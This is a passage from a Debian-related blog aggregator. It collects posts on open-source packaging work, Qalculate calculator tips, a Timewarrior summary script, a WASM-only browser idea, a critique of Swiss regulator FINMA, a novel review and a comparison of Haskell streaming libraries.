Unlike others I never texted Steve much; we’d occasionally chat on IRC, but nothing major. That didn’t seem to matter when we actually saw each other in person though, we just picked up like we’d seen each other the previous week. DebConf became a recurring theme of when we’d see each other. Even outside DebConf we went places together. The first time I went somewhere in the US that wasn’t the Bay Area, it was to Portland to see Steve. He, and his family, came to visit me in Belfast a couple of times, and I did road trip from Dublin to Cork with him. He took me to a volcano.
Steve saw injustice in the world and actually tried to do something about it. I still have a copy of the US constitution sitting on my desk that he gave me. He made me want to be a better person.
The world is a worse place without him in it, and while I am better for having known him, I am sadder for the fact he’s gone.
Most of my Debian contributions this month were sponsored by Freexian.
You can also support my work directly via Liberapay.
OpenSSH upstream released 9.9p2 with fixes for CVE-2025-26465 and CVE-2025-26466. I got a heads-up on this in advance from the Debian security team, and prepared updates for all of testing/unstable, bookworm (Debian 12), bullseye (Debian 11), buster (Debian 10, LTS), and stretch (Debian 9, ELTS). jessie (Debian 8) is also still in ELTS for a few more months, but wasn’t affected by either vulnerability.
Although I’m not particularly active in the Perl team, I fixed a libnet-ssleay-perl build failure because it was blocking openssl from migrating to testing, which in turn was blocking the above openssh fixes.
I also sent a minor sshd -T
fix upstream, simplified
a number of autopkgtests using the newish Restrictions:
needs-sudo
facility, and prepared for
removing the obsolete slogin
symlink.
I upgraded to the new upstream version 0.83.
I fixed build failures with GCC 15 in a few packages:
A lot of my Python team work is driven by its maintainer
dashboard.
Now that we’ve finished the transition to Python 3.13 as the default
version, and inspired by a recent debian-devel thread started by
Santiago, I
thought it might be worth spending a bit of time on the “uscan error”
section. uscan
is typically
scraping upstream web sites to figure out whether new versions are
available, and so it’s easy for its configuration to become outdated or
broken. Most of this work is pretty boring, but it can often reveal
situations where we didn’t even realize that a Debian package was out of
date. I fixed these packages:
I upgraded these packages to new upstream versions:
In bookworm-backports, I updated python-django to 3:4.2.18-1 (issuing BSA-121) and added new backports of python-django-dynamic-fixture and python-django-pgtrigger, all of which are dependencies of debusine.
I went through all the build failures related to python-click 8.2.0 (which was confusingly tagged but not fully released upstream and posted an analysis.
I fixed or helped to fix various other build/test failures:
I dropped support for the old setup.py ftest
command from
zope.testrunner upstream.
I fixed various odds and ends of bugs:
setuptools_scm
to
setuptools-scm
Following up on last month, I merged and
uploaded Helmut’s /usr
-move
fix.
02 March, 2025 01:49PM by Colin Watson
01 March, 2025 10:01PM by Junichi Uekawa
Another short status update of what happened on my side last month. One larger blocks are the Phosh 0.45 release, also reviews took a considerable amount of time. From the fun side debugging bananui and coming up with a fix in phoc as well as setting up a small GSM network using osmocom to test more Cell Broadcast thingies were likely the most fun parts.
wlr_damage_ring_rotate_buffer
(MR). Another prep for 0.19.x.wp-alpha-modifier-v1
protocol (MR)mk-gitlab-rel
and improve it for alpha, beta, RCs (MR)~
(MR)xdg-occlusion
(now xdg-cutouts
) protocol (MR)python3
as interpreter as well (MR)This is not code by me but reviews on other peoples code. The list is a slightly incomplete. Thanks for the contributions!
get_geometry_default
(MR)If you want to support my work see donations.
Join the Fediverse thread
I wanted to follow new content posted to Printables.com with a feed reader, but Printables.com doesn't provide one. Neither do the other obvious 3d model catalogues. So, I started building one.
I have something that spits out an Atom feed and a couple of beta testers gave me some valuable feedback. I had planned to make it public, with the ultimate goal being to convince Printables.com to implement feeds themselves.
Meanwhile, I stumbled across someone else who has done basically the same thing. Here are 3rd party feeds for
The format of their feeds is JSON-Feed, which is new to me. FreshRSS and NetNewsWire seems happy with it. (I went with Atom.) I may still release my take, if I find time to make one improvmment that my beta-testers suggested.
So there are only 2 web browser engines, and it seems likely there will soon only be 1, and making a whole new web browser from the ground up is effectively impossible because the browsers vendors have weaponized web standards complexity against any newcomers. Maybe eventually someone will succeed and there will be 2 again. Best case. What a situation.
So throw out all the web standards. Make a browser that just runs WASM blobs, and gives them a surface to use, sorta like Wayland does. It has tabs, and a throbber, and urls, but no HTML, no javascript, no CSS. Just HTTP of WASM blobs.
This is where the web browser is going eventually anyway, except in the current line of evolution it will be WASM with all the web standards complexity baked in and reinforcing the current situation.
Would this be a mass of proprietary software? Have you looked at any corporate website's "source" lately? But what's important is that this would make it easy enough to build new browsers that they would stop being a point of control.
Want a browser that natively supports RSS? Poll the feeds, make a UI, download the WASM enclosures to view the posts. Want a browser that supports IPFS or gopher? Fork any browser and add it, the mantenance load will be minimal. Want to provide access to GPIO pins or something? Add an extension that can be accessed via the WASI component model. This would allow for so many things like that which won't and can't happen with the current market duopoly browser situation.
And as for your WASM web pages, well you can still use HTML if you like. Use the WASI component model to pull in a HTML engine. It doesn't need to support everything, just the parts of web standards that you want to use. Or you can do something entitely different in your WASM that is not HTML based at all but a better paradigm (oh hi Spritely or display postscript or gemini capsules or whatever).
Dual innovation sources or duopoly? I know which I'd prefer. This is not my project to build though.
This is going to be a controversial statement because some people are absolute nerds about this, but, I need to say it.
Qalculate is the best calculator that has ever been made.
I am not going to try to convince you of this, I just wanted to put out my bias out there before writing down those notes. I am a total fan.
This page will collect my notes of cool hacks I do with
Qalculate. Most examples are copy-pasted from the command-line
interface (qalc(1)
), but I typically use the graphical interface as
it's slightly better at displaying complex formulas. Discoverability
is obviously also better for the cornucopia of features this fantastic
application ships.
On Debian, Qalculate's CLI interface can be installed with:
apt install qalc
Then you start it with the qalc
command, and end up on a prompt:
anarcat@angela:~$ qalc
>
Then it's a normal calculator:
anarcat@angela:~$ qalc
> 1+1
1 + 1 = 2
> 1/7
1 / 7 ≈ 0.1429
> pi
pi ≈ 3.142
>
There's a bunch of variables to control display, approximation, and so on:
> set precision 6
> 1/7
1 / 7 ≈ 0.142857
> set precision 20
> pi
pi ≈ 3.1415926535897932385
When I need more, I typically browse around the menus. One big issue I
have with Qalculate is there are a lot of menus and features. I had
to fiddle quite a bit to figure out that set precision
command
above. I might add more examples here as I find them.
I often use the data units to estimate bandwidths. For example, here's what 1 megabit per second is over a month ("about 300 GiB"):
> 1 megabit/s * 30 day to gibibyte
(1 megabit/second) × (30 days) ≈ 301.7 GiB
Or, "how long will it take to download X", in this case, 1GiB over a 100 mbps link:
> 1GiB/(100 megabit/s)
(1 gibibyte) / (100 megabits/second) ≈ 1 min + 25.90 s
To calculate how much entropy (in bits) a given password structure,
you count the number of possibilities in each entry (say, [a-z]
is
26 possibilities, "one word in a 8k dictionary" is 8000), extract the
base-2 logarithm, multiplied by the number of entries.
For example, an alphabetic 14-character password is:
> log2(26*2)*14
log₂(26 × 2) × 14 ≈ 79.81
... 80 bits of entropy. To get the equivalent in a Diceware password with a 8000 word dictionary, you would need:
> log2(8k)*x = 80
(log₂(8 × 000) × x) = 80 ≈
x ≈ 6.170
... about 6 words, which gives you:
> log2(8k)*6
log₂(8 × 1000) × 6 ≈ 77.79
78 bits of entropy.
You can convert between currencies!
> 1 EUR to USD
1 EUR ≈ 1.038 USD
Even fake ones!
> 1 BTC to USD
1 BTC ≈ 96712 USD
This relies on a database pulled form the internet (typically the central european bank rates, see the source). It will prompt you if it's too old:
It has been 256 days since the exchange rates last were updated.
Do you wish to update the exchange rates now? y
As a reader pointed out, you can set the refresh rate for currencies, as some countries will require way more frequent exchange rates.
The graphical version has a little graphical indicator that, when you mouse over, tells you where the rate comes from.
Here are other neat conversions extracted from my history
> teaspoon to ml
teaspoon = 5 mL
> tablespoon to ml
tablespoon = 15 mL
> 1 cup to ml
1 cup ≈ 236.6 mL
> 6 L/100km to mpg
(6 liters) / (100 kilometers) ≈ 39.20 mpg
> 100 kph to mph
100 kph ≈ 62.14 mph
> (108km - 72km) / 110km/h
((108 kilometers) − (72 kilometers)) / (110 kilometers/hour) ≈
19 min + 38.18 s
This is a more involved example I often do.
Say you have started a long running copy job and you don't have the
luxury of having a pipe you can insert pv(1) into to get a nice
progress bar. For example, rsync
or cp -R
can have that problem
(but not tar
!).
(Yes, you can use --info=progress2
in rsync
, but that estimate is
incremental and therefore inaccurate unless you disable the
incremental mode with --no-inc-recursive
, but then you pay a huge
up-front wait cost while the entire directory gets crawled.)
First step is to gather data. Find the process start time. If you were
unfortunate enough to forget to run date --iso-8601=seconds
before
starting, you can get a similar timestamp with stat(1)
on the
process tree in /proc
with:
$ stat /proc/11232
File: /proc/11232
Size: 0 Blocks: 0 IO Block: 1024 directory
Device: 0,21 Inode: 57021 Links: 9
Access: (0555/dr-xr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2025-02-07 15:50:25.287220819 -0500
Modify: 2025-02-07 15:50:25.287220819 -0500
Change: 2025-02-07 15:50:25.287220819 -0500
Birth: -
So our start time is 2025-02-07 15:50:25
, we shave off the
nanoseconds there, they're below our precision noise floor.
If you're not dealing with an actual UNIX process, you need to figure out a start time: this can be a SQL query, a network request, whatever, exercise for the reader.
This is optional, but for the sake of demonstration, let's save this as a variable:
> start="2025-02-07 15:50:25"
save("2025-02-07T15:50:25"; start; Temporary; ; 1) =
"2025-02-07T15:50:25"
Next, estimate your data size. That will vary wildly with the job
you're running: this can be anything: number of files, documents being
processed, rows to be destroyed in a database, whatever. In this case,
rsync
tells me how many bytes it has transferred so far:
# rsync -ASHaXx --info=progress2 /srv/ /srv-zfs/
2.968.252.503.968 94% 7,63MB/s 6:04:58 xfr#464440, ir-chk=1000/982266)
Strip off the weird dots in there, because that will confuse qalculate, which will count this as:
2.968252503968 bytes ≈ 2.968 B
Or, essentially, three bytes. We actually transferred almost 3TB here:
2968252503968 bytes ≈ 2.968 TB
So let's use that. If you had the misfortune of making rsync silent,
but were lucky enough to transfer entire partitions, you can use df
(without -h
! we want to be more precise here), in my case:
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036 179205040 98% /srv
tank/srv 7667173248 2870444032 4796729216 38% /srv-zfs
(Otherwise, of course, you use du -sh $DIRECTORY
.)
Those are 1 K
bytes which is actually (and rather unfortunately)
Ki
, or "kibibytes" (1024 bytes), not "kilobytes" (1000 bytes). Ugh.
> 2870444032 KiB
2870444032 kibibytes ≈ 2.939 TB
> 2870444032 kB
2870444032 kilobytes ≈ 2.870 TB
At this scale, those details matter quite a bit, we're talking about a 69GB (64GiB) difference here:
> 2870444032 KiB - 2870444032 kB
(2870444032 kibibytes) − (2870444032 kilobytes) ≈ 68.89 GB
Anyways. Let's take 2968252503968 bytes
as our current progress.
Our entire dataset is 7258298064 KiB
, as seen above.
We have 3 out of four variables for our equation here, so we can already solve:
> (now-start)/x = (2996538438607 bytes)/(7258298064 KiB) to h
((actual − start) / x) = ((2996538438607 bytes) / (7258298064
kibibytes))
x ≈ 59.24 h
The entire transfer will take about 60 hours to complete! Note that's not the time left, that is the total time.
To break this down step by step, we could calculate how long it has taken so far:
> now-start
now − start ≈ 23 h + 53 min + 6.762 s
> now-start to s
now − start ≈ 85987 s
... and do the cross-multiplication manually, it's basically:
x/(now-start) = (total/current)
so:
x = (total/current) * (now-start)
or, in Qalc:
> ((7258298064 kibibytes) / ( 2996538438607 bytes) ) * 85987 s
((7258298064 kibibytes) / (2996538438607 bytes)) × (85987 secondes) ≈
2 d + 11 h + 14 min + 38.81 s
It's interesting it gives us different units here! Not sure why.
The now
here is actually a built-in variable:
> now
now ≈ "2025-02-08T22:25:25"
There is a bewildering list of such variables, for example:
> uptime
uptime = 5 d + 6 h + 34 min + 12.11 s
> golden
golden ≈ 1.618
> exact
golden = (√(5) + 1) / 2
In any case, yay! We know the transfer is going to take roughly 60 hours total, and we've already spent around 24h of that, so, we have 36h left.
But I did that all in my head, we can ask more of Qalc yet!
Let's make another variable, for that total estimated time:
> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)
save(((now − start) / x) = ((2996538438607 bytes) / (7258298064
kibibytes)); total; Temporary; ; 1) ≈
2 d + 11 h + 14 min + 38.22 s
And we can plug that into another formula with our start time to figure out when we'll be done!
> start+total
start + total ≈ "2025-02-10T03:28:52"
> start+total-now
start + total − now ≈ 1 d + 11 h + 34 min + 48.52 s
> start+total-now to h
start + total − now ≈ 35 h + 34 min + 32.01 s
That transfer has ~1d left, or 35h24m32s, and should complete around 4 in the morning on February 10th.
But that's icing on top. I typically only do the cross-multiplication and calculate the remaining time in my head.
I mostly did the last bit to show Qalculate could compute dates and time differences, as long as you use ISO timestamps. Although it can also convert to and from UNIX timestamps, it cannot parse arbitrary date strings (yet?).
Qalculate can:
I have a hard time finding things it cannot do. When I get there, I typically need to resort to programming code in Python, use a spreadsheet, and others will turn to more complete engines like Maple, Mathematica or R.
But for daily use, Qalculate is just fantastic.
And it's pink! Use it!
This is just scratching the surface, the fine manual has more information, including more examples. There is also of course a qalc(1) manual page which also ships an excellent EXAMPLES section.
Qalculate is packaged for over 30 Linux distributions, but also ships packages for Windows and MacOS. There are third-party derivatives as well including a web version and an Android app.
Colin Watson liked this blog post and was inspired to write his own hacks, similar to what's here, but with extras, check it out!
FINMA closed the business of Parreaux, Thiébaud & Partners / Justicia SA in April 2023 but they did not publish their judgment at the same time.
6 September 2023 they announced the resigntion of Urban Angehrn, director of FINMA since 1 November 2021.
Challenges that were successfully overcome under his leadership include, in particular, [ ... snip ... ], the supervision of supplementary health insurance geared towards client protection and the conclusion of complex enforcement proceedings.
19 September 2023 FINMA published the judgment against Parreaux, Thiébaud & Partners / Justicia SA. They suppressed the names and dates in the document.
Mr Angehrn departed on 30 September.
They wrote that Mr Angehrn had closed the business of Parreaux, Thiébaud & Partners / Justicia SA "successfully". But the clients received nothing.
He had shut down just one single scam in almost two years as director of FINMA.
Thanks to the financial accounts for 2023, we found the director's salary CHF 602,000 and the termination payment CHF 581,000.
”Being able to contribute to the sustainable improvement of the quality of the Swiss financial centre as CEO of FINMA was a unique challenge for me, and one that I tackled with all my might. However, the high and permanent stress level had health consequences. I have considered my decision carefully and have now decided to step down,” says Urban Angehrn.
He resigned due to stress and he received CHF 581,000 as a leaving gift. The clients received nothing.
apt-offline version 1.8.6 was released almost 3 weeks ago on 08/February/2025
This release includes many bug fixes from community users.
apt-offline (1.8.6-1) unstable; urgency=medium
* Error out if we cannot initialize the APT lock.
Thanks to Matthew Maslak
* check for checksum and handle appropriately (#217)
Thanks to Dan Whitman (Github:kyp44)
* Honor the --allow-unauthenticated option.
Thanks to João A (Github: Jonybat)
* Retry when server reports 429 Too Many Requests occurs.
Thanks to Zoltan Kelemen (Github: misterzed88)
* Also support file:/// url types.
Thanks to c4bhuf@github
* Honor user specified extra gpg keyrings
-- Ritesh Raj Sarraf <rrs@debian.org> Sat, 08 Feb 2025 20:46:24 +0530
26 February, 2025 01:26PM by Ritesh Raj Sarraf (rrs@researchut.com)
Review: A Little Vice, by Erin E. Elkin
Publisher: | Erin Elkin |
Copyright: | June 2024 |
ASIN: | B0CTHRK61X |
Format: | Kindle |
Pages: | 398 |
A Little Vice is a stand-alone self-published magical girl novel. It is the author's first novel.
C is a high school student and frequent near-victim of monster attacks. Due to the nefarious work of Avaritia Wolf and her allies, his high school is constantly attacked by Beasts, who are magical corruptions of some internal desire taken to absurd extremes. Standing in their way are the Angelic Saints: magical girls who transform into Saint Castitas, Saint Diligentia, and Saint Temperantia and fight the monsters. The monsters for some reason seem disposed to pick C as their victim for hostage-taking, mind control, use as a human shield, and other rather traumatic activities. He's always rescued by the Saints before any great harm is done, but in some ways this makes the situation worse.
It is obvious to C that the Saints are his three friends Inessa, Ida, and Temperance, even though no one else seems able to figure this out despite the blatant clues. Inessa has been his best friend since childhood when she was awkward and needed his support. Now, she and his other friends have become literal heroes, beautiful and powerful and capable, constantly protecting the school and innocent people, and C is little more than a helpless burden to be rescued. More than anything else, he wishes he could be an Angelic Saint like them, but of course the whole idea is impossible. Boys don't get to be magical girls.
(I'm using he/him pronouns for C in this review because C uses them for himself for most of the book.)
This is a difficult book to review because it is deeply focused on portraying a specific internal emotional battle in all of its sometimes-ugly complexity, and to some extent it prioritizes that portrayal over conventional story-telling. You have probably already guessed that this is a transgender coming-out story — Elkin's choice of the magical girl genre was done with deep understanding of its role in transgender narratives — but more than that, it is a transgender coming-out story of a very specific and closely-observed type. C knows who he wishes he was, but he is certain that this transformation is absolutely impossible. He is very deep in a cycle of self-loathing for wanting something so manifestly absurd and insulting to people who have the virtues that C does not.
A Little Vice is told in the first person from C's perspective, and most of this book is a relentless observation of C's anxiety and shame spiral and reflexive deflection of any possibility of a way out. This is very well-written: Elkin knows the reader is going to disagree with C's internalized disgust and hopelessness, knows the reader desperately wants C to break out of that mindset, and clearly signals in a myriad of adroit ways that Elkin is on the reader's side and does not agree with C's analysis. C's friends are sympathetic, good-hearted people, and while sometimes oblivious, it is obvious to the reader that they're also on the reader's side and would help C in a heartbeat if they saw an opening. But much of the point of the book is that it's not that easy, that breaking out of the internal anxiety spiral is nearly impossible, and that C is very good at rejecting help, both because he cannot imagine what form it could take but also because he is certain that he does not deserve it.
In other words, much of the reading experience of this book involves watching C torture and insult himself. It's all the more effective because it isn't gratuitous. C's internal monologue sounds exactly like how an anxiety spiral feels, complete with the sort of half-effective coping mechanisms, deflections, and emotional suppression one develops to blunt that type of emotional turmoil.
I normally hate this kind of book. I am a happy ending and competence porn reader by default. The world is full of enough pain that I don't turn to fiction to read about more pain. It says a lot about how well-constructed this book is that I stuck with it. Elkin is going somewhere with the story, C gets moments of joy and delight along the way to keep the reader from bogging down completely, and the best parts of the book feel like a prolonged musical crescendo with suspended chords. There is a climax coming, but Elkin is going to make you wait for it for far longer than you want to.
The main element that protects A Little Vice from being too grim is that it is a genre novel that is very playful about both magical girls and superhero tropes in general. I've already alluded to one of those elements: Elkin plays with the Mask Principle (the inability of people to see through entirely obvious secret identities) in knowing and entertaining ways. But there are also villains, and that leads me to the absolutely delightful Avaritia Wolf, who for me was the best character in this book.
The Angelic Saints are not the only possible approach to magical girl powers in this universe. There are villains who can perform a similar transformation, except they embrace a vice rather than a virtue. Avaritia Wolf embraces the vice of greed. They (Avaritia's pronouns change over the course of the book) also have a secret identity, which I suspect will be blindingly obvious to most readers but which I'll avoid mentioning since it's still arguably a spoiler.
The primary plot arc of this book is an attempt to recruit C to the side of the villains. The Beasts are drawn to him because he has magical potential, and the villains are less picky about gender. This initially involves some creepy and disturbing mind control, but it also brings C into contact with Avaritia and Avaritia's very specific understanding of greed. As far as Avaritia is concerned, greed means wanting whatever they want, for whatever reason they feel like wanting it, and there is absolutely no reason why that shouldn't include being greedy for their friends to be happy. Or doing whatever they can to make their friends happy, whether or not that looks like villainy.
Elkin does two things with this plot that I thought were remarkably skillful. The first is that she directly examines and then undermines the "easy" transgender magical girl ending. In a world of transformation magic, someone who wants to be a girl could simply turn into a girl and thus apparently resolve the conflict in a way that makes everyone happy. I think there is an important place for that story (I am a vigorous defender of escapist fantasy and happy endings), but that is not the story that Elkin is telling. I won't go into the details of why and how the story complicates and undermines this easy ending, but it's a lot of why this book feels both painful and honest to a specific, and very not easy, transgender experience, even though it takes place in an utterly unrealistic world.
But the second, which is more happy and joyful, is that Avaritia gleefully uses a wholehearted embrace of every implication of the vice of greed to bulldoze the binary morality of the story and question the classification of human emotions into virtues and vices. They are not a hero, or even all that good; they have some serious flaws and a very anarchic attitude towards society. But Avaritia provides the compelling, infectious thrill of the character who looks at the social construction of morality that is constraining the story and decides that it's all bullshit and refuses to comply. This is almost the exact opposite of C's default emotional position at the start of the book, and watching the two characters play off of each other in a complex friendship is an absolute delight.
The ending of this book is complicated, messy, and incomplete. It is the sort of ending that I think could be incredibly powerful if it hits precisely the right chords with the reader, but if you're not that reader, it can also be a little heartbreaking because Elkin refuses to provide an easy resolution. The ending also drops some threads that I wish Elkin hadn't dropped; there are some characters who I thought deserved a resolution that they don't get. But this is one of those books where the author knows exactly what story they're trying to tell and tells it whether or not that fits what the reader wants. Those books are often not easy reading, but I think there's something special about them.
This is not the novel for people who want detailed world-building that puts a solid explanation under events. I thought Elkin did a great job playing with the conventions of an episodic anime, including starting the book on Episode 12 to imply C's backstory with monster attacks and hinting at a parallel light anime story by providing TV-trailer-style plot summaries and teasers at the start and end of each chapter. There is a fascinating interplay between the story in which the Angelic Saints are the protagonists, which the reader can partly extrapolate, and the novel about C that one is actually reading. But the details of the world-building are kept at the anime plot level: There's an arch-villain, a World Tree, and a bit of backstory, but none of it makes that much sense or turns into a coherent set of rules. This is a psychological novel; the background and rules exist to support C's story.
If you do want that psychological novel... well, I'm not sure whether to recommend this book or not. I admire the construction of this book a great deal, but I don't think appealing to the broadest possible audience was the goal. C's anxiety spiral is very repetitive, because anxiety spirals are very repetitive, and you have to be willing to read for the grace notes on the doom loop if you're going to enjoy this book. The sentence-by-sentence writing quality is fine but nothing remarkable, and is a bit shy of the average traditionally-published novel. The main appeal of A Little Vice is in the deep and unflinching portrayal of a specific emotional journey. I think this book is going to work if you're sufficiently invested in that journey that you are willing to read the brutal and repetitive parts. If you're not, there's a chance you will bounce off this hard.
I was invested, and I'm glad I read this, but caveat emptor. You may want to try a sample first.
One final note: If you're deep in the book world, you may wonder, like I did, if the title is a reference to Hanya Yanagihara's (in)famous A Little Life. I do not know for certain — I have not read that book because I am not interested in being emotionally brutalized — but if it is, I don't think there is much similarity. Both books are to some extent about four friends, but I couldn't find any other obvious connections from some Wikipedia reading, and A Little Vice, despite C's emotional turmoil, seems to be considerably more upbeat.
Content notes: Emotionally abusive parent, some thoughts of self-harm, mind control, body dysmorphia, and a lot (a lot) of shame and self-loathing.
Rating: 7 out of 10
Sigh, sometimes I really don’t understand time. And I don’t mean, in the physics sense.
It’s just, the days have way fewer hours than 10 years ago, or there’s way more stuff to do. Probably the latter 😅
No time for real open-source work, but I managed to do some minor coding, released a couple of minor version (as upstream), and packaged some refreshes in Debian. The later only because I got involved, against better judgement, into some too heated discussions, but they ended well, somehow. But the whole episode motivated me to actually do some work, even if minor, than just rant on mailing lists 🙊.
My sports life is still pretty erratic, but despite some repeated sickness (my fault, for not sleeping well enough) and tendon issues, there are months in which I can put down 100km. And the skiing season was really awesome.
So life goes on, but I definitely am not keeping up with entropy, even in simple things such as my inbox. One day I’ll make real blog post, not just an update, but in the meantime, it is what it is.
And yes, running 10km while still sick just because you’re bored is not the best idea. According to a friend, of course, not to my Strava account.
Anarcat recently wrote about Qalculate, and I think I’m a convert, even though I’ve only barely scratched the surface.
The thing I almost immediately started using it for is time calculations.
When I started tracking my time, I
quickly found that Timewarrior was good at
keeping all the data I needed, but I often found myself extracting bits of
it and reprocessing it in variously clumsy ways. For example, I often don’t
finish a task in one sitting; maybe I take breaks, or I switch back and
forth between a couple of different tasks. The raw output of timew
summary
is a bit clumsy for this, as it shows each chunk of time spent as
a separate row:
$ timew summary 2025-02-18 Debian Wk Date Day Tags Start End Time Total W8 2025-02-18 Tue CVE-2025-26465, Debian, 9:41:44 10:24:17 0:42:33 next, openssh Debian, FTBFS with GCC-15, 10:24:17 10:27:12 0:02:55 icoutils Debian, FTBFS with GCC-15, 11:50:05 11:57:25 0:07:20 kali Debian, Upgrade to 0.67, 11:58:21 12:12:41 0:14:20 python_holidays Debian, FTBFS with GCC-15, 12:14:15 12:33:19 0:19:04 vigor Debian, FTBFS with GCC-15, 12:39:02 12:39:38 0:00:36 python_setproctitle Debian, Upgrade to 1.3.4, 12:39:39 12:46:05 0:06:26 python_setproctitle Debian, FTBFS with GCC-15, 12:48:28 12:49:42 0:01:14 python_setproctitle Debian, Upgrade to 3.4.1, 12:52:07 13:02:27 0:10:20 1:44:48 python_charset_normalizer 1:44:48
So I wrote this Python program to help me:
#! /usr/bin/python3 """ Summarize timewarrior data, grouped and sorted by time spent. """ import json import subprocess from argparse import ArgumentParser, RawDescriptionHelpFormatter from collections import defaultdict from datetime import datetime, timedelta, timezone from operator import itemgetter from rich import box, print from rich.table import Table parser = ArgumentParser( description=__doc__, formatter_class=RawDescriptionHelpFormatter ) parser.add_argument("-t", "--only-total", default=False, action="store_true") parser.add_argument( "range", nargs="?", default=":today", help="Time range (usually a hint, e.g. :lastweek)", ) parser.add_argument("tag", nargs="*", help="Tags to filter by") args = parser.parse_args() entries: defaultdict[str, timedelta] = defaultdict(timedelta) now = datetime.now(timezone.utc) for entry in json.loads( subprocess.run( ["timew", "export", args.range, *args.tag], check=True, capture_output=True, text=True, ).stdout ): start = datetime.fromisoformat(entry["start"]) if "end" in entry: end = datetime.fromisoformat(entry["end"]) else: end = now entries[", ".join(entry["tags"])] += end - start if not args.only_total: table = Table(box=box.SIMPLE, highlight=True) table.add_column("Tags") table.add_column("Time", justify="right") for tags, time in sorted(entries.items(), key=itemgetter(1), reverse=True): table.add_row(tags, str(time)) print(table) total = sum(entries.values(), start=timedelta()) hours, rest = divmod(total, timedelta(hours=1)) minutes, rest = divmod(rest, timedelta(minutes=1)) seconds = rest.seconds print(f"Total time: {hours:02}:{minutes:02}:{seconds:02}")
$ summarize-time 2025-02-18 Debian Tags Time ─────────────────────────────────────────────────────────────── CVE-2025-26465, Debian, next, openssh 0:42:33 Debian, FTBFS with GCC-15, vigor 0:19:04 Debian, Upgrade to 0.67, python_holidays 0:14:20 Debian, Upgrade to 3.4.1, python_charset_normalizer 0:10:20 Debian, FTBFS with GCC-15, kali 0:07:20 Debian, Upgrade to 1.3.4, python_setproctitle 0:06:26 Debian, FTBFS with GCC-15, icoutils 0:02:55 Debian, FTBFS with GCC-15, python_setproctitle 0:01:50 Total time: 01:44:48
Much nicer. But that only helps with some of my reporting. At the end of a
month, I have to work out how much time to bill Freexian for and fill out a
timesheet, and for various reasons those queries don’t correspond to single
timew
tags: they sometimes correspond to the sum of all time spent on
multiple tags, or to the time spent on one tag minus the time spent on
another tag, or similar. As a result I quite often have to do basic
arithmetic on time intervals; but that’s surprisingly annoying! I didn’t
previously have good tools for that, and was reduced to doing things like
str(timedelta(hours=..., minutes=..., seconds=...) + ...)
in Python,
which gets old fast.
Instead:
$ qalc '62:46:30 - 51:02:42 to time' (225990 / 3600) − (183762 / 3600) = 11:43:48
I also often want to work out how much of my time I’ve spent on Debian work this month so far, since Freexian pays me for up to 20% of my work time on Debian; if I’m under that then I might want to prioritize more Debian projects, and if I’m over then I should be prioritizing more Freexian projects as otherwise I’m not going to get paid for that time.
$ summarize-time -t :month Freexian Total time: 69:19:42 $ summarize-time -t :month Debian Total time: 24:05:30 $ qalc '24:05:30 / (24:05:30 + 69:19:42) to %' (86730 / 3600) / ((86730 / 3600) + (249582 / 3600)) ≈ 25.78855349%
I love it.
23 February, 2025 08:00PM by Colin Watson
For my PhD, my colleagues/collaborators and I built a distributed stream-processing system using Haskell. There are several other Haskell stream-processing systems. How do they compare?
First, let's briefly discuss and define streaming in this context.
Structure and Interpretation of Computer Programs introduces Streams as an analogue of lists, to support delayed evaluation. In brief, the inductive list type (a list is either an empty list or a head element pre-pended to another list) is replaced with a structure with a head element and a promise which, when evaluated, will generate the tail (which in turn may have a head element and a promise to generate another tail, culminating in the equivalent of an empty list.) Later on SICP also covers lazy evaluation.
However, the streaming we're talking about originates in the relational community, rather than the functional one, and is subtly different. It's about building a pipeline of processing that receives and emits data but doesn't need to (indeed, cannot) reference the whole stream (which may be infinite) at once.
Now let's go over some Haskell streaming systems.
Conduit is the oldest of the ones I am reviewing here, but I doubt it's the first in the Haskell ecosystem. If I've made any obvious omissions, please let me know!
Conduit provides a new set of types to model streaming data, and a completely
new set of functions which are analogues of standard Prelude functions, e.g.
sumC
in place of sum
. It provides its own combinator(s) such as .|
(
aka fuse)
which is like composition but reads left-to-right.
The motivation for this is to enable (near?) constant memory usage for processing large streams of data -- presumably versus using a list-based approach and to provide some determinism: the README gives the example of "promptly closing file handles". I think this is another way of saying that it uses strict evaluation, or at least avoids lazy evaluation for some things.
Conduit offers interleaved effects: which is to say, IO can be performed mid-stream.
Conduit supports distributed operation via Data.Conduit.Network
in the
conduit-extra
package. Michael Snoyman, principal Conduit author, wrote
up how to use it here: https://www.yesodweb.com/blog/2014/03/network-conduit-async
To write a distributed Conduit application, the application programmer must
manually determine the boundaries between the clients/servers and write specific
code to connect them.
The Pipes Tutorial contrasts itself with "Conventional Haskell stream programming": whether that means Conduit or something else, I don't know.
Paraphrasing their pitch: Effects, Streaming Composability: pick two. That's the situation they describe for stream programming prior to Pipes. They argue Pipes offers all three.
Pipes offers it's own combinators (which read left-to-right) and offers interleaved effects.
At this point I can't really see what fundamentally distinguishes Pipes from Conduit.
Pipes has some support for distributed operation via the sister library
pipes-network. It
looks like you must send and receive ByteString
s, which means rolling
your own serialisation for other types. As with Conduit, to send or receive
over a network, the application programmer must divide their program up
into the sub-programs for each node, and add the necessary ingress/egress
code.
io-streams emphasises simple primitives. Reading and writing is done
under the IO Monad, thus, in an effectful (but non-pure) context. The
presence or absence of further stream data are signalled by using the
Maybe
type (Just
more data or Nothing
: the producer has finished.)
It provides a library of functions that shadow the standard Prelude, such
as S.fromList
, S.mapM
, etc.
It's not clear to me what the motivation for io-streams is, beyond providing a simple interface. There's no declaration of intent that I can find about (e.g.) constant-memory operation.
There's no mention of or support (that I can find) for distributed operation.
Similar to io-streams, Streaming emphasises providing a simple
interface that gels well with traditional Haskell methods. Streaming
provides effectful streams (via a Monad -- any Monad?) and a collection
of functions for manipulating streams which are designed to closely
mimic standard Prelude (and Data.List
) functions.
Streaming doesn't push its own combinators: the examples provided
use $
and read right-to-left.
The motivation for Streaming seems to be to avoid memory leaks caused by
extracting pure lists from IO with traditional functions like mapM
,
which require all the list constructors to be evaluated, the list to be
completely deconstructed, and then a new list constructed.
Like io-streams, the focus of the library is providing a low-level streaming abstraction, and there is no support for distributed operation.
Streamly appears to have the grand goal of providing a unified programming tool as suited for quick-and-dirty programming tasks (normally the domain of scripting languages) and high-performance work (C, Java, Rust, etc.). Their intended audience appears to be everyone, or at least, not just existing Haskell programmers. See their rationale
